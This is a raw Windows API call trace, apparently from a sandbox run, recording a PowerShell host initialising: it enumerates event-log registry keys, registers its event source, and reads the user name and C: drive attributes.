	[0204.218] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.218] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x1, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.219] CoTaskMemFree (pv=0x408e50) 
	[0204.219] CoTaskMemFree (pv=0x0) 
	[0204.219] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.219] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x2, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.221] CoTaskMemFree (pv=0x408e50) 
	[0204.221] CoTaskMemFree (pv=0x0) 
	[0204.221] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.221] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x3, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.222] CoTaskMemFree (pv=0x408e50) 
	[0204.222] CoTaskMemFree (pv=0x0) 
	[0204.222] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.222] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x4, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.223] CoTaskMemFree (pv=0x408e50) 
	[0204.223] CoTaskMemFree (pv=0x0) 
	[0204.223] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.223] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x5, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.225] CoTaskMemFree (pv=0x408e50) 
	[0204.225] CoTaskMemFree (pv=0x0) 
	[0204.225] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.225] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x6, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.226] CoTaskMemFree (pv=0x408e50) 
	[0204.226] CoTaskMemFree (pv=0x0) 
	[0204.226] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.226] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x7, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.227] CoTaskMemFree (pv=0x408e50) 
	[0204.227] CoTaskMemFree (pv=0x0) 
	[0204.227] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.227] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x8, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.229] CoTaskMemFree (pv=0x408e50) 
	[0204.229] CoTaskMemFree (pv=0x0) 
	[0204.229] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x308) returned 0x0
	[0204.229] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x0) returned 0x2
	[0204.229] RegOpenKeyExW (in: hKey=0x328, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x30c) returned 0x0
	[0204.229] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x0) returned 0x2
	[0204.229] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x310) returned 0x0
	[0204.229] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x0) returned 0x2
	[0204.229] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x1d4) returned 0x0
	[0204.229] RegOpenKeyExW (in: hKey=0x1d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x0) returned 0x2
	[0204.230] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x330) returned 0x0
	[0204.230] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x0) returned 0x2
	[0204.230] RegOpenKeyExW (in: hKey=0x328, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x334) returned 0x0
	[0204.230] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x0) returned 0x2
	[0204.230] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd068 | out: phkResult=0x1dd068*=0x0) returned 0x5
	[0204.828] CoTaskMemAlloc (cb=0x804) returned 0x1b891e10
	[0204.828] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b891e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0204.829] CoTaskMemFree (pv=0x1b891e10) 
	[0204.830] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.830] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0204.831] CoTaskMemFree (pv=0x408e50) 
	[0211.811] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dcfb8 | out: phkResult=0x1dcfb8*=0x344) returned 0x0
	[0211.811] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1dcf2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dcf28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1dcf2c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dcf28*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.811] CoTaskMemFree (pv=0x0) 
	[0211.811] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.811] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.811] CoTaskMemFree (pv=0x408e50) 
	[0211.811] CoTaskMemFree (pv=0x0) 
	[0211.811] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.811] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.812] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.812] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.812] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.812] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.812] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.812] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0211.812] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x408e50, lpcchName=0x1dcfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1dcfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.812] CoTaskMemFree (pv=0x408e50) 
	[0211.812] CoTaskMemFree (pv=0x0) 
	[0211.812] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x348) returned 0x0
	[0211.813] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x0) returned 0x2
	[0211.813] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x34c) returned 0x0
	[0211.813] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x0) returned 0x2
	[0211.813] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x350) returned 0x0
	[0211.813] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x0) returned 0x2
	[0211.813] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x354) returned 0x0
	[0211.813] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x0) returned 0x2
	[0211.813] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x358) returned 0x0
	[0211.813] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x0) returned 0x2
	[0211.813] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x35c) returned 0x0
	[0211.813] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x0) returned 0x2
	[0211.813] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd018 | out: phkResult=0x1dd018*=0x0) returned 0x5
	[0212.606] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x2780008
	[0212.866] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x326e370*="WSMan", lpRawData=0x326e0e0) returned 1
	[0212.881] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0212.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.906] CoTaskMemAlloc (cb=0x804) returned 0x1b891e10
	[0212.906] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b891e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0212.906] CoTaskMemFree (pv=0x1b891e10) 
	[0212.906] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0212.906] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0212.906] CoTaskMemFree (pv=0x408e50) 
	[0212.907] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d5d6d8*="Alias", lpRawData=0x2d5d468) returned 1
	[0212.921] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0212.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.921] CoTaskMemFree (pv=0x3c3ba0) 
	[0212.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.923] CoTaskMemAlloc (cb=0x804) returned 0x1b891e10
	[0212.923] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b891e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0212.923] CoTaskMemFree (pv=0x1b891e10) 
	[0212.923] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0212.923] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0212.923] CoTaskMemFree (pv=0x408e50) 
	[0212.924] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d63128*="Environment", lpRawData=0x2d62eb8) returned 1
	[0212.945] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0212.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.945] CoTaskMemFree (pv=0x3c3ba0) 
	[0212.946] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0212.946] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0212.946] CoTaskMemFree (pv=0x3c3ba0) 
	[0212.946] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0212.946] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0212.946] CoTaskMemFree (pv=0x3c3ba0) 
	[0212.946] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1dce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0212.946] SetErrorMode (uMode=0x1) returned 0x1
	[0212.946] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1dd030 | out: lpFileInformation=0x1dd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.946] SetErrorMode (uMode=0x1) returned 0x1
	[0212.947] GetLogicalDrives () returned 0x4
	[0212.948] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1dcb90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.949] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.949] SetErrorMode (uMode=0x1) returned 0x1
	[0212.950] CoTaskMemAlloc (cb=0x68) returned 0x1b872890
	[0212.950] CoTaskMemAlloc (cb=0x68) returned 0x1b872900
	[0212.950] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b872890, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1dd000, lpMaximumComponentLength=0x1dcffc, lpFileSystemFlags=0x1dcff8, lpFileSystemNameBuffer=0x1b872900, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1dd000*=0x705ba84c, lpMaximumComponentLength=0x1dcffc*=0xff, lpFileSystemFlags=0x1dcff8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0212.950] CoTaskMemFree (pv=0x1b872890) 
	[0212.950] CoTaskMemFree (pv=0x1b872900) 
	[0212.950] SetErrorMode (uMode=0x1) returned 0x1
	[0212.950] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.951] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.951] SetErrorMode (uMode=0x1) returned 0x1
	[0212.951] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1dcfa0 | out: lpFileInformation=0x1dcfa0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.951] SetErrorMode (uMode=0x1) returned 0x1
	[0212.951] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.951] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1dcbf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.952] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.952] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1dcb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.952] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.953] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcb70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.953] SetErrorMode (uMode=0x1) returned 0x1
	[0212.953] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1dcdd0 | out: lpFileInformation=0x1dcdd0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.953] SetErrorMode (uMode=0x1) returned 0x1
	[0212.953] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcb70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.953] SetErrorMode (uMode=0x1) returned 0x1
	[0212.953] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1dcdd0 | out: lpFileInformation=0x1dcdd0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.953] SetErrorMode (uMode=0x1) returned 0x1
	[0212.953] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1dcc10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.953] SetErrorMode (uMode=0x1) returned 0x1
	[0212.954] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1dce70 | out: lpFileInformation=0x1dce70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.954] SetErrorMode (uMode=0x1) returned 0x1
	[0212.954] CoTaskMemAlloc (cb=0x804) returned 0x1b891e10
	[0212.954] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b891e10, nSize=0x1dd278 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1dd278) returned 0x1
	[0212.954] CoTaskMemFree (pv=0x1b891e10) 
	[0212.954] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0212.954] GetUserNameW (in: lpBuffer=0x408e50, pcbBuffer=0x1dd2b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1dd2b8) returned 1
	[0212.954] CoTaskMemFree (pv=0x408e50) 
	[0212.955] ReportEventW (hEventLog=0x2780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6a180*="FileSystem", lpRawData=0x2d69f10) returned 1
	[0212.983] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0212.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.983] CoTaskMemFree (pv=0x3c3ba0) 
	[0212.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dcaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
